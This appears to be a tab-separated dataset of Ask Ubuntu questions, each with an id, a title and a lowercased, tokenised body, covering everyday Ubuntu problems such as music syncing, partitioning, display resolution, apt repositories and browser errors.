26535	music server + banshee	i 'm currently trying to figure out some kind of set-up for my music collection . the music collection is located on my `` main pc '' and i 'm using banshee to play/manage the music . since i 'm often at a different location where i use my laptop i have a ftp server running on my main pc , use curlftpfs to mount the music in /home/username/music and sync the banshee db/configuration via dropbox . the problem at the moment is that banshee skips songs very often when the connection is a little slower . i 've been looking at some servers like ampache but they are not really an option since they do n't let me use banshee ( which means i have no ability to change metadata or rate songs ) . syncing the whole collection to my laptop is n't an option either because of its size . it would be great if you had some ideas how to make my current set-up more reliable or maybe know an alternative .
26536	how to move multiple files over network from terminal	i am using this command gvfs-move file smb : //server/directory/file to move files over a samba share i would like to transfer multiple files by piping the results of a gvfs-ls to the same command however i can not use a wild card to limit the search like this gvfs-ls smb : //server/directory/*.mkv how do i create a list of files over a samba share and proccess those ?
26538	getting my walkman into mtp mode	i have a nwz-e344 walkman and i 've created some .mpi files that can get the music player to read but it will only go into mtp mode when i 'm logged into the root account . when i log into my regular account it wo n't go into mtp mode . is there some way i can get it to go into mtp mode on my regular account too ?
26540	does saving my progress on a u1-synced file/folder put unneccesary strain on the servers ?	i love ubuntu one and i use it all the time . i have my documents and music composition folders set to sync . it 's been a real boon . however , sometimes i feel that constantly saving my progress forces the file to sync dozens and dozens of times to the servers . it seems wasteful to me so i 've been disconnecting u1 until i 'm finished working on a project . is this an unnecessary action that i am taking ? i know it 's using amazon 's storage but i 'm still paranoid that i 'm costing canonical money when i constantly save my progress .
26541	what exactly is -- no-daemon function in gnome-power-manager	i have problem with monitor flickering and here i found that possible solution is to run gnome-power-manager like this : gnome-power-manager -- no-daemon for some people this fixed the issues . i am asking what exactly is this -- no-daemon function and can it negatively affect the system ? put it other way : can i always run gnome-power-manager with -- no-daemon function ? thx for the answer
26542	what is a daemon ?	i hear a lot of talk about daemons running on my ubuntu computer - what are they ?
26546	docky customization	i modded my docky-sources , so i have no reflection anymore . where can i remove the separators or change the metrics like this
26550	how do i assign a bug to myself in launchpad ?	i 'm interested in fixing a bug in ubuntu , but i do n't want to step on anyone 's toes . how do i `` claim '' a bug to let people know i 'm working on it ? ( screenshots of where in launchpad to click please )
26553	how to create a custom startup image on a livecd	i would like to create a custom startup image ( in place of the default ubuntu logo ) on a livecd that i will be producing for internal use within my company . i would like to brand it with a company logo during the bootup process , and be able to customize various icons in the installation process ( similar to jolicloud )
26555	running php-cli server	good day everyone , i recently got interested in the websocket technology . i built myself a server using php which i ran on windows using the php cli . that was fine for development , but now i need to think about deployment . i got myself a little vps running ubuntu server 10.10 . i have basic knowledge of linux , so i set up my ssh client , installed php-cli and messed around to make sure it works , which it does . now , i can simply run my server using php server.php but i do n't think that 's a great way of doing it . a few concerns : what will happen to the console output once i close my ssh client ? what if the server crashes ? i ca n't do anything else on my vps while the server is running this way in the main thread regarding the console output ; is there a way to redirect stdout or something to a file , so i can still see the console output on windows but on my vps it is logged instead ? as for the server crashes , what are some good ways to restart some processes automatically on server boot ? and i think i could run it as a daemon or a service or something like that so it does n't hang the main thread ? so , what are some usually used solutions for those problems ? is there somewhere i can read up more on this ? i 'd like to learn a little bit in the process ! thanks .
26557	turning off xon/xoff when sshing via putty	i have a fresh install of ubuntu 9.10 on a rented dedicated server . when i ssh to it using putty ( on a windows machine ) , i find it responds to ctrl+s and ctrl+q as xon/xoff transmission control ( i.e . the terminal freezes everytime i type ctrl+s until i type ctrl + q ) . this has n't been a problem on other remote servers , and i realise i do n't really have much idea about how this is determined . is this something that is negotiated at the start of the terminal session , something that is set by the choice of terminal emulation ( term=xterm , if that helps ) or - as i suspect - some setting on the server i am not aware of . how do i tell ubuntu that it is 2011 , and no-one has terminals that rely on xon/xoff any more ?
26558	facebook does n't work with chromium , works fine with firefox	my facebook does n't work with chromium , but it works fine with firefox .
26563	boot failure on installation from a burned iso image	i 'm encountering boot failure while trying to install a linux distro from a cd . i 'm using an older pc ; here are its specs : hp pavilion a255c 2.66ghz cpu , 512mb ram with a bios revision of 6/30/2003 i reclaimed an older drive ( seagate st340810a ) that seems to be working , as it 's recognized in the bios ( auto-detected ) . so this is not the original hdd , but a replacement . i downloaded a mini.iso of ubuntu 10.10 that i want to install , and burned the image to a cd for install . my boot sequence is : first boot device [ cdrom ] . i disabled devices 2-4 so i can just force it to read first from the cd-rom . this old pc also has a separate cd writer which is a sec.slave . the sec.master is the toshiba dvd/rom dsm-171 drive where i placed the burned linux cd . with these settings i can not get it to boot . i get the message '' disk boot failure , insert system disk and press enter '' when i start the pc with the cd ( burned iso image ) . would i be able to boot off a usb flash drive ? would that work ?
26564	can not play windows wma lossless files on rhythmbox	i have installed ubuntu 10.10 with all its updates ( without windows ) on it’s own drive and everything is working fine . i want to play wma audio files , also mp3 files . the mp3 files play fine . the wma files do not play . used `` rhythmbox music player '' with and without `` ubuntu-restricted '' -extras . still does not play the lossless windows audio files . i am frustrated with searching to play a wma file ( `` download this converter '' ) , but one can not use this until one `` deletes this '' . i have done everything but it still does not play my windows lossless files that i made from all my cd’s . i am looking for a music player that i can use to play mp3’s and wma lossless music files and automatically put the album cover on and update the info if one exists . installation should be as simple as possible . right now i am back to the original virgin ubuntu 10.10 with all the recent updates . this computer will do nothing but play music ( mp3 and wma ) through a stereo system . i also use internet to update album info for the music . i do not care what bells and whistles the music player program has , as long as it is an easy install and just plays my mp3 and wma lossless music files . any help would be appreciated .
26566	possibility of inconsistencies in backups across lvm logical volume snapshots	i 'd like to start using lvm snapshots to help ensure quality backups . if i have a /var partition that is on a separate volume from the rest of the root filesystem , can i still ensure that a backup accurately reflects the state of the entire system at a particular point in time ? is it worthwhile , based on the nature of the files in /var , to be concerned with this ?
26567	using lvm snapshots on a live system : possibility of corruption due to system activity	if i am doing backups from lvm snapshots of a live system , how can i best avoid problems due to the snapshot being taken during things like upgrades ? presumably this would n't be catastrophic , since it would be less serious than a power outage during the upgrade , but it could cause at least some amount of inconvenience .
26569	how to get pngcrush to overwrite original files ?	i 've read through man pngcrush and it seems that there is no way to crush a png file and save it over the original . i want to compress several folders worth of pngs so it would be useful to do it all with one command ! currently i am doing pngcrush -q -d tmp *.png then manually cut-pasting the files from the tmp directory to the original folder . so i guess using mv might be the best way to go ? any better ideas ?
26571	how can find out the device id of my unmounted dvd ?	when i put a dvd into the dvd drive , it appears in nautilus places , but is not automatically mounted . ( this is by personal choice ) . in this unmounted state , mount ( of course ) reports nothing , and likewise for df.. but nautilus is aware of the dvd hardware unit and has read the label ; which it shows in places so it seems to me that nautilus has already accessed the dvd devices ( did it temporarily mount it ? ) ... the main point of my question was to determine how to find the device id of an unmounted device .. but as i 've been writing this , i now think it may not be as simple as that ... this issue came up because i wanted to test this command cat iso-pieces . * | growisofs -z /dev/dvd=/dev/stdin , but then realized that i did n't know how to get my dvd 's device id . ... and does the above command requires a mounted device , or does it write directly to the device ? ... as you can see , i 'm a bit vague about devices : ) come to think of it maybe nautalus read the dvd device directly , because when all is said and done , something has to read/write directly to it . info growisofs says : under linux it will most likely be an ide-scsi device such as `` /dev/scd0 how can i find this id via a script ?
26574	i ca n't use my ipod touch ( 32gb )	i have connected my ipod touch 32gb in my ubuntu 10.10 os.it 's connected on os and shows in desktop . but it 's not showing as a device in rhythmbox music player . and also i ca n't open directly like folder or drive or usb device . when i try to open it show this error : could not display `` gphoto2 : // [ usb:001,003 ] / '' . error : dbus error org.freedesktop.dbus.error.serviceunknown : the name :1.207 was not provided by any .service files please select another viewer and try again . any solution for this problem ?
26580	one of my 3 usb ports can automount my portable hdd , not the other 2	i need help . my portable hdd can be plugged into my new asus n43j laptop in windows 7 from any of the 3 usb ports . in ubuntu , it only works with 1 port . using 10.04 64bit . please advise . edit : i just realised that the port is usb3.0 . sorry for my ignorance . how do i get my western digital hdd to work in usb 3.0 for ubuntu 10.04 64 bit ?
26584	using an apt proxy for downloads during installation	during system installation from a desktop livecd ( 10.10 ) i checked the `` download updates during installation '' option . before starting the install i had configured an apt proxy server . the proxy server was configured by writing acquire : :http { proxy `` http : //apt-proxy-server:3142 '' ; } ; to the new file /etc/apt/apt.conf.d/02proxy on the running system booted from the livecd . this proxy was used correctly for my various package installs on the live system prior to launching the system installation gui . it accesses apt-cacher-ng running in non-transparent mode on the machine apt-proxy-server . however , the downloads taking place during the installation are not using this proxy . i verified that the file 02proxy had not been changed or removed . is there a way to force usage of an apt proxy during installation ?
26585	the partition table is corrupt	i have a corrupt the partition table on the laptop that is running ubuntu 10.4 . before the partition table was corrupt i had the following partitions : 2 primary partitions : 1st - ntfs 2nd - extended 4 logical partitons that are built within 2nd extended : 1st ntfs ( 68 gib ) 2nd linux ( 19 gib ) 3rd swap ( 1.4 gib ) 4th linux ( 24 gib ) the physical order of these partitions was the following : ( 4th linux ) - ( 1st ntfs ) - ( 2nd linux ) - ( 3rd swap ) the logical order of the partition was different : ( 1st ntfs ) - ( 2nd linux ) - ( 3rd swap ) ( 4th linux ) ntfs partition was big and it resided between 2 linux partitions , neither of these partitions had enough space to install oracle 11g . therefore , i decided to a ) either move the ntfs partion to the left or b ) remove it completely and extend partition where linux resides . as i tool i have chosen gparted . but unfortunately it was not able to move the partition because he found that in ntfs partition there are some blocks that are referenced multiple times . also it was not able to remove the partition neither , because in this case the partitions that follow it ( 2nd linux ) - ( 3rd swap ) have to be in his opinion also removed , because the organization of extended partition is a linked list . since gparted was not able to do such thing i was trying to find another tool . i found diskdrake tool on pslinuxos distribution of linux . that tool silently deleted ( 1st ntfs ) partition and i thought that everything was fine . but diskdrake has damaged the partition in a way that i am not able either to boot from the hard disk nor to see the partitions with gparted and even with diskdrake itself ! fortunately i have a live cd of ubuntu 8.10 and i am able to boot and see hard disk . i have 2 ideas how i can solve the problem : 1 ) manually change disk partitions and point them to the correct partitions . 2 ) create partition table with gparted that as much as possible is the same with the previous one i find the 2nd approach less time consuming but some data will be lost because of it is not possible to place borders of the partitions exactly how it was before . and moreover i am not sure if such approach would work , for example , if the os is able to locate files after repartitioning . i feel like that it will but not 100 % sure . are there some ideas how the problem may be solved ?
26586	is it possible to know when files were deleted ?	is it possible to know that ? , like when were they deleted , by which user , etc ; or is any information regarding the files completely erased
26589	no splash screen on hibernate	hibernate is working fine . a bit slow when resuming from a hibernate but i can bear with it just so that i have all open applications on the desktop as i left it . then again the `` slowness '' might be because of the 4gb ram , although i 'm assuming only what is used gets swapped and not the entire memory . has anyone been able to make ubuntu show a splash screen or some kind of indicator/progress bar to show while hibernating or while resuming ? i remember with suse on my hp compaq presario notebook it had messages appear during and after . better than nothing , i guess .
26601	new computer hangs on shutdown/reboot , how to troubleshoot ?	my system is working perfectly but it freezes during shutdown/reboot/suspend/hibernate : all windows and the menu bar disappear but the desktop wallpaper remains . it does n't even show the shutdown screen ( the one with the animated dots ) where i could hit esc and watch the shutdown console text . the system is brand-new and fully updated using update manager . how can i determine what is causing the freeze ? is there a log i can investigate ? how can i fix this ? i see no obvious cause of the freeze . the only usb attachment is a mouse/keyboard ; i do n't have any external storage attached ; and i do n't have any programs running ( the machine freezes even when doing shutdown right from the login screen ) . what i 've tried so far : based on other questions ( this , this , and this ) that suggest some acpi settings , i 've tried sudo shutdown -h now to see whether the shutdown console text display offers any hints , but the system does n't even get that far - it still freezes while the screen shown the desktop background image , without any toolbars . only sudo shutdown -- force works , but that 's not a solution . editing the grub menu to add acpi=off to the kernel did n't help . i guess there 's not much point in trying the other ( lesser ) acpi suggestions ? adding noapic to the grub entry had no discernible effect . adding nolapic instead did something ( i had removed the quiet option ) - the system managed to continue further with the shutdown , right until the line checking for running unattended-upgrades : which were the last characters on the screen . i 've also checked the system bios , especially regarding power options , but did n't see anything out of the ordinary . switching the bios standby setting from s3 to s1 did n't help . the standby setting ca n't be disabled , and there are no other acpi-related settings afaik . bios reset did n't help . not surprised ; had n't changed anything . i tried going to a virtual console ( ctrlaltf1 ) as suggested by djeikyb and from there did a shutdown -h now and it froze there too , after this console output . i did n't try killing processes one at a time because i 'm still too newbie to figure out how to do that . booting with kernel 2.6.35.22 rather than 2.6.35.25 did n't help . disabling the nvidia drivers did n't help . booting from live cd ( usb stick in fact ) did n't help ; it freezes the same way . booting from live cd , with acpi=off noapic nolapic did n't help either . neither did just nolapic . so evidently this is not some custom setting in my install , but some sort of basic issue . memtest competed in 1 hour without errors .
26610	how can i force x to start in a computer without a monitor ?	i have a computer that has no monitor attached to it . when i boot the system , x fails to start because there is no monitor detected . if i boot it with a monitor attached and after x has started , when i remove the monitor everything works fine . details and background : this computer is a kind of hardware consolidation server . it 's only purpose is to run two virtual box vm 's that run windows xp and some important but seldom used ( once or twice a month ) programs . for a couple of time it has been lying in a corner with an old monitor attached to it and working great . but space in the office was getting scarce and i moved the computer to the server room . there is no monitor attached to it there ( no space ) , and sometimes the computer is rebooted . when it boots without monitor x is not started , the vms does n't start and i get called to solve the problem .
26616	how do i configure function keys and fn on a thinkpad edge ?	i have problem with functional keys . when i want f1 i must press fn + f1 . i want to change to press only f1 . under fn + f1 i would have the functional key ( now is mute )
26619	javascript is not loading	hey , i 've got a problem with javascript under ubuntu , that drives me crazy . i 'm using gedit for my web sites since i 'm an ubuntu user . when i start a new website i create ( usually with the gnome terminal ) folder structure , and i copy the files i need into them . the next step is creating an index.html where i build the design and basic javascript functionality . javascript is stored in a sub-folder of the project and when i try to load one using the tag in the header , my whole page body disappears . if the source contains a script tag with its own body , and its not the first its code wont run . i 've tried to solve the problem by setting chmod to 777 with sudo chmod -r 777 . but nothing changed . css is loading correctly , but js is n't . i 'm using the newest version of apache , no mod_rewrite stuff , but i get the same problem when i run the html from file ( file : /// ... ) do anyone know how to solve this problem ?
26622	how to mark dependencies as solved ?	on my ubuntu i needed to install a newer version of erlang . then i installed rabbitmq-server with dpkg -- force-depends -i rabbitmq-server_2.1.1-1_all.deb and everything worked fine , till ... now i have the following problem when doing an apt-get install or upgrade : rabbitmq-server : depends : erlang-base ( > = 1:12.b.3 ) but it is not installable or erlang-base-hipe ( > = 1:12.b.3 ) but it is not installable depends : erlang-ssl which is a virtual package . or erlang-nox ( < 1:13.b-dfsg1-1 ) but it is not installable depends : erlang-os-mon which is a virtual package . or erlang-nox ( < 1:13.b-dfsg1-1 ) but it is not installable depends : erlang-mnesia which is a virtual package . or erlang-nox ( < 1:13.b-dfsg1-1 ) but it is not installable depends : erlang-inets which is a virtual package . or erlang-nox ( < 1:13.b-dfsg1-1 ) but it is not installable remove the following packages : rabbitmq-server score is 121 accept this solution ? [ y/n/q/ ? ] what command tells apt to resolve dependencies without removing the package ? thanks a lot in advance ...
26628	ca n't switch workspaces	i ca n't switch workspaces using the panel or the shortcut [ ctrl+alt+left/right > ] . when i click on the workspace panel , there is no response . how do i fix this problem ?
26631	fullscreen windowed mode in id games	i run a twinview , dual monitor system . i like to play games fullscreen on one of the monitors , not spanning both . with wine , this works by just setting it to desktop mode and setting the resolution to that of one screen . for openttd , i used compiz 's window rules plugin . but i have a few native games that this does n't work for . today 's experiment involved prey ( doom 3 engine ) but i 've had similar issues with other id engines . so in short : has anybody found a way of having prey/openareana/doom3/etc run in windowed mode but with fullscreen decorations ( that is to say , no borders and above the panel ) ?
26632	how to install eclipse ?	i want to install the latest version of eclipse but the ubuntu software centre contains an older version . is there a ppa or some other way to install latest eclipse ? please describe the steps for full installation .
26639	installer does n't display partition i want to install to	while performing a ubuntu 10.10 installation on my laptop , it does n't show partitions pertaining to the pc . my pc configuration is as follows : hp pavilion dv6 - 2020ax amd turion ii dual core mobile processor m500 4 gb ram os installed : windows 7 500 gb hard drive partitioned as follows : c : 227 gb ( free : 142 gb ) d : 11.9 gb ( free : 1.98 gb ) - recovery f : 174 gb ( free : 18 gb ) g : 50.5 gb ( free : 50.4 gb ) so , i want to perform a dual-boot installation on my pc , so that ubuntu resides in the free disk space g : . therefore , i started the ubuntu 10.10 installation and select the manual partitioning feature in the installation . however , in the 'allocate drive space ' section of the installation , following partitions information is displayed : partition type size used /dev/sda /dev/sda1 1 mb unknown /dev/sda2 ntfs 208 mb unknown /dev/sda3 ntfs 244813 mb 168540 mb /dev/sda4 ntfs 255083 mb 3221 mb where /dev/sda - 500 gb so , what exactly is the problem ? what is it should i do to install ubuntu 10.10 in the g : disk space ? why are the partitions not being shown as the way they should be ? any suggestions . thank you for the help .
26646	amd raid smart tests ubuntu server	i have an amd sb with raid 1 set up through that . i installed ubuntu server with no problems . however i know through windows one can set up smart tests with amd 's software . is there a way to run smart tests on a recurring schedule in ubuntu and have it email failures ?
26650	how to get srgp working ?	i 'm running 64-bit ubuntu 10.10 , and i 'm trying to make srgp work . srgp is an old graphics package that accompanies the book `` computer graphics '' by foley , van dam , et al . i have installed libx11-dev , but i still ca n't get through make . i get the error `` can not find -lsrgp '' when i typed make prog=show_pattern . full compilation messages are here http : //pastebin.com/cwuw4xte what do i have to do to get it working ?
26652	export igoogle rss and import into liferea	i use igoogle for my rss reader , now i need to use liferea on my desktop and i need to export my igoogle rss and import into liferea . i was trying export my rss from igoogle ( the default export format is .xml ) but when i tried to import into liferea i get this error message is there another way to do this ?
26654	`` invalid openid transaction '' when signing into launchpad	when i click on the `` log in / register '' link on the website https : //launchpad.net , i always arrive on a blank page only displaying `` invalid openid transaction '' . this happens every time in firefox , but never in chromium nor in epiphany . where does that come from and how do i fix it ?
26655	how do you know when to use shift+insert vs ctrl-v vs right-click-paste to paste ?	some times i copy something to the clipboard , and it does n't paste with shift+insert , but with ctrl+v or right-click paste . the behavior seems confusing and a bit unpredictable . is there some logic behind the variation ?
26658	is it possible to exclude a file or folder from being synced , while it is in a directory that was synced ?	i synced a folder called `` travel '' . i want to exclude a file in this folder from being synced . is this possible ? do the other big syncers , like dropbox and mozy , have this feature ?
26663	how to take screenshot on ubuntu-guest ( virtualbox )	i am running ubuntu 10.10 amd64 in a virtualbox on windows host . whenever i try to take a screenshot by pressing the print screen or by launching the gnome-screenshot option the screenshot appears completely black . any idea how to get a screenshot inside the virtualbox ?
26666	cisco vpn connection using certstore as in windows	in windows i was using cisco vpn client to connect with vpn . in connection properties i set only hostname and choose certificate which are stored in c : \program files\cisco systems\vpn client\certificates . i moved yesterday to ubuntu and i need to be able to connect with that host using those certificates too . i know that there is vpnc and network-manager-vpnc but it not allows ( or i do not know about it ) to set cerificates dir . can someone tell me how to connect with vpn using certificates ?
26673	how do i use mp4mux to create mp4 as recommended by pitivi ?	i 'm trying to export video for use with the html5 tag . i 've already created a nice webm encoding but ca n't create the equivalent mp4 video . the mp4 option in pitivi says it 's not recommended and produces corrupted mp4 video when i use it . it recommends using mp4mux to render the project instead , but i ca n't find this option anywhere and google is failing me . how do i enable mp4mux rendering of mp4 in pitivi ?
26676	installing alongside win7 ; entire disk shows as unallocated	i am trying to install 10.10 along with a win7 installation , but i ca n't . when i run the installer it says that the entire disk is free ( unallocated ) . if i try to run the `` try ubuntu '' thing instead , it can access the other partition ( s ) , but when i run gparted it will say the disk is free . i 've read somewhere this is due to buggy gpt support ; but does anyone know who to fix this ?
26679	tuning my ubuntu installation	i 'm using ubuntu 10.10 and i 'm interested in hearing a few tips on how to improve performance and tune my system to be faster . any articles or links on this ? thanks in advance !
26682	how can i set my resolution to 1280x1024 on an acer aspire revo 3700 ?	final update : here is the best solution that i found after going through this problem lots of times . the question below is outdated because as it turns out the computer is not the problem ; the monitor is the problem . i 've just set up a new nettop computer ( acer aspire revo 3700 : cpu : atom d525 , gpu : nvidia ion2 ) . i 've just made a clean install of ubuntu 10.10 using the standard usb pendrive method . almost everything works ok , but the graphics are not ok : the recommended nvidia driver is activated but the monitor is not detected , so the resolution is wrong . how can i make ubuntu detect my monitor ? how can i get the proper resolution ( 1280x1024 ) in ubuntu ? i know that my monitor is not a crt but an lcd : it 's a benq , model t905 , with 1280x1024 resolution at 60hz , connected via a normal vga cable . dvi or hdmi is not an option . when i go to system > prefs > monitors , i get : it appears that your graphics driver does not support the necessary extensions to use this tool . do you want to use your graphics driver vendor 's tool instead ? yes no if i say no then i get a window : or for yes i get this : in both cases i do n't see that i can fix this problem . the main reason for getting this new computer was that i was sick of having graphics problems on the old one with a very ugly solution that did n't give me hardware support - but at least i got the resultion . why is this so difficult ... sigh !
26694	how do i install samba 4 ?	does anyone have a good installation manual to install samba 4 on ubuntu 10.10 . i found a lot of articles to install samba 4 but all are different and most will not work with my ubuntu version . so some questions has been arised like `` where get i the recent built for ubuntu '' and so on .
26695	well supported hardware raid controller	i am currently planning to buy a hardware-raid controller . this became necessary since i am running linux and windows in parallel and now need the redundancy for both os ( im am going to use raid1 / mirroring ) . therefore i am searching for a hardware raid controller which is well supported by linux / ubuntu ( reporting smart values , stats for the harddrives , etc ... ) . this controller should have four sata ports and if possible it should fit in a pcie-1x slot . i would greatly appreciate , if you could suggest some devices . thanks in advance
26698	how to limit download/upload speed for specific users ?	i want to setup an ubuntu server in which some users are limited to a specific download/upload speed.is it possible ? i know about wondershaper , trickle or similar tools but i do n't want to limit programs or an interface bandwidth because the machine will have different kind of users . a solution for limiting speed for a group or specific users would be great .
26700	how do i manually install the oracle java plugin for google chrome and firefox ?	how to install java plugin to these browsers manually ? i downloaded jre from oracle site , run it in terminal . now , what i should do ? . i want to do it manually because , i want to be up-date with recent java version .
26702	does gnome-schedule run things on startup if the run time is missed ?	i have a script that i would like to run daily . i set it up in gnome-schedule to run every day at 00:00 , and i 'm wondering whether it will run on startup if my computer was not turned on at 00:00 . if not , is there a way to make it do that ?
26703	packages not showing up in created apt repository	i created an apt repository using deb-scanpackages , and it seemed to go well . when i did a apt-get update on another server , the packages.gz file was retrieved , and all seemed well - until i went to search for the packages contained in that repository ( all packages are created locally ) . several recommendations suggested reprepro ; i tried that . same result - except i had to rebuild the packages with the priority and section lines in the control file ( nothing says this anywhere ) . the reprepro utility also generates a complicated directory structure which required rewriting the repository entry on the requesting server . i then found that the arch directory referenced i386 and not amd64 ( which was requested by the requesting server ) . is it possible that the amd64 system is n't seeing packages compiled for i386 ? searching the *packages files in /var/lib/apt/lists show that the only packages for i386 are those i added ( the other files are for the server - ubuntu 10.04.2 lts ) . the server the packages were built on is ubuntu 10.04.2 lts i686 ; the requesting server is x86_64 . i found some discussion at the debian amd64faq but it claims to be obsolete . it makes mention of an extended syntax for repository listings for apt , and a command dpkg-subarchitecture - neither of which work on the local amd64 server . do i have to build two different sets of packages ?
26706	how do i force a folder sort for my downloaded music on rhythmbox	when i import music from an external source , it sorts it into the nice and organized folders by artist - album , but when i import music from downloads , it just references the file in downloads and does n't sort it . how can i force rhythmbox to sort my downloaded music . ubuntu 10.10 , rhythmbox 0.13.1
26710	music player with a few specific requirements	i am looking for a music player with a few specific requirements : must have a search function that whittles down results as you type , searching the entire library . must start playing a song when double clicked , and not continue to another song when that song finishes . must be approachable and immediately usable by people completely unfamiliar with the program . i think this is mostly covered by the first two requirements being met . i 've tried many players but unfortunately every one has failed to meet at least one of the requirements . rhythmbox meets 1 and 3 , but continues to the next search result after the song which was double clicked ends . banshee is basically the same as rhythmbox . while it has an option to `` stop when finished '' this can not ( as far as i can tell ) be made the default when double clicking a song . audacious ( as far as i can tell ) fails at 1 . muine meets requirements 1 and 2 , but unfortunately i could n't make the search dialog always shown like it is with rhythmbox / banshee which , despite its very simple interface , made muine incomprehensible to people trying to use it for the first time . amarok i could not configure to meet requirement 1 , but i think it 's likely i was just missing something , and with its configurability i 'm confident that i can set it up to meet requirements 2 and 3 .
26711	trying to install pithos but	by following the instructions here ... but when i do i get following errors . anyone have any ideas as to why ? this is a really neat program that i like a lot and would like to get it going again . w : failed to fetch http : //ppa.launchpad.net/pj-assis/ppa/ubuntu/dists/karmic/release.gpg could not connect to ppa.launchpad.net:80 ( 91.189.90.217 ) . - connect ( 111 : connection refused ) w : failed to fetch http : //ppa.launchpad.net/pj-assis/ppa/ubuntu/dists/karmic/main/i18n/translation-en.bz2 unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/pj-assis/ppa/ubuntu/dists/karmic/main/i18n/translation-en_us.bz2 unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/dockbar-main/ppa/ubuntu/dists/maverick/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/dockbar-main/ppa/ubuntu/dists/maverick/main/i18n/translation-en.bz2 unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/dockbar-main/ppa/ubuntu/dists/maverick/main/i18n/translation-en_us.bz2 unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/kevin-mehall/pithos-daily/ubuntu/dists/maverick/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/kevin-mehall/pithos-daily/ubuntu/dists/maverick/main/i18n/translation-en.bz2 unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/kevin-mehall/pithos-daily/ubuntu/dists/maverick/main/i18n/translation-en_us.bz2 unable to connect to ppa.launchpad.net : http : w : some index files failed to download , they have been ignored , or old ones used instead .
26717	full screen flash problems	when i play flash videos from sites such as youtube , the videos initially play ok . however when the videos are full screened , a number of problems arise . usually when the full screen button is first clicked , the video will take up the full screen , but will be frozen ( however the video audio can still be heard ) . it can take several attempts to get the video to play in full screen . the video is also frozen if something triggers notify-osd ( changing the volume , getting a new email etc . ) any ideas what might be going wrong ?
26718	getting `` unable to find a medium containing a live file system '' when installing 10.10	i got this error while trying to install ubuntu 10.10 from a bootable usb stick on to sony vaio p series laptop . the disk boots into the language and installation type screen . after that it goes through the splash and pulls up this error : busybox v1.13.3 ( ubuntu 1:1.13.3-ubuntu11 ) built in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) unable to find a medium containing a live file system after getting this error the installation fails to start . i have used the same usb stick on some other laptops and the installation started as usual . any help will be appreciated . my installation is i386 and my machine is vaio p vgn-p610 . i 've tried every possible thing : bios : [ enable boot external ] boot order : [ external ] [ hard drive ] [ network boot ] tried 2 different usb drives tried 2 different external cd drives tried 6 different downloads of both the desktop and netbook remix . all downloads were checked with md5sum . ubuntu desktop 9.10 installs properly in every version and from every source . getting reaaaally frustrated .
26720	how do i add matlab to the main menu ?	i was trying to add the installed matlab to the menu of applications under ubuntu 10.10 . i clicked gnome-menu - > preference - > main menu - > programming - > new item , where i input the matlab file ... /matlabr2010b/bin/matlab as the command , and selected the type to be `` application '' . then i finished . but when i click the item in the menu of applications , the matlab icon shows up for a few seconds and then nothing else happens . if i select the type to be `` application in terminal '' , then in the last step of adding matlab to the applications menu , after i click the item in the menu of applications , there will be firstly a terminal window and then the matlab command window . so i was wondering how to solve the problem of matlab not starting when the type has been selected to be `` application '' ? also is there a way to eliminate the terminal appearing when the type has been selected to be `` application in terminal '' ?
26722	device type `` loop '' in mount command	i was wondering what `` loop '' mean in this usage of mount : mount -t iso9660 -o loop matlab.iso /media/cdrom0 is it a type of device ? what does this device type `` loop '' mean ? can i choose other device types for the iso file ? thanks !
26727	cp command process info	is there any specific package for cp command which shows the process of being copied . i 'm wondering if there is any package cp which shows additional information that what has been copied and what are left or how many percentage it has been copied ... etc . any body using any ?
26730	how do you download a font and then install it ?	to use for various stuff ... thanks for the help .
26735	is there any way to take my current setup and put it on a live disk , then install it to another machine ?	a tutorial or specific directions would be great .
26736	is a firewall really necessary these days ?	should i install something like gufw ?
26739	where can i find a spotify .deb package ?	it appears to me that spotify have released a linux client ... however every attempt i 've made to get it from the repositries have failed . it would really help me if someone could provide a .deb package .
26745	how to set an hourly alarm ?	i am using the alarm-clock application and the alarm-clock-applet , and the only frequency i can set , are for days of the week . i want an hourly alarm , is there any way to do that ? googling did not provide any answers , neither did au , seems like no one has asked this question ever before . atm , i use crontab to fire a notify-send each hour . any other application/methods ? thanks .
26749	how to tell apt-get to install another version of eclipse ?	apt-get installs eclipse version 3.5 when i do this : sudo apt-get install eclipse-platform however i would like to install version 3.6 . how can i do that ?
26754	/opt and /usr/local on the same partition but not under root	i am planning to install ubuntu on a new laptop soon . i want to put /opt and /usr/local directories separately from the root and home partitions , but i do n't need two partitions for them , just one . is it possible to put these two directories on a single separate partition , preferably without using soft-links ? following a soft-link requires path resolution , so i do n't think it 's a good idea to soft-link commonly-accessed top-level directories .
26760	my files disappeared from the ubuntuone synced folder	i set up an ubuntuone account on pc1 ( ubuntu 10.10 ) and the same account on pc2 ( ubuntu 10.04 ) . i did the following : created file named maverick.txt in pc1 's ~/ubuntu one/log created file named venus.txt in pc2 's ~/ubuntu one/log bot files appeared in one.ubuntu.com a few hours later , those two files are disappeared from pc1 's ubuntu one/log pc2 's ubuntu one/log one.ubuntu.com so , my files are gone forever . why did this happen ? is there any way to recover those files ?
26762	chromium error 105 ( net : :err_name_not_resolved )	sir , i am using both chromium and firefox on ubuntu 10.10 . while firefox works fine , chromium gives error 105 ( net : :err_name_not_resolved ) for all sites except google searches , i.e . if i type anything in the smart-search bar of chrome , i get the search results . but if i try to open www.google.com or any other site , i get the error . chrome suddenly started giving this error . it was working fine the previous day . i am not under any proxy . firefox and chrome on windows are also working fine . please help .
26766	how to solve the django_settings_module error ?	i installed wsgi , python , apache and django on my ubuntu 10.04 but when i django-admin.py runserver i get this error error : settings can not be imported , because environment variable django_settings_module is undefined . how to solve this ? any replies will be much appreciated ... . and a step by step answers will be great , , ,
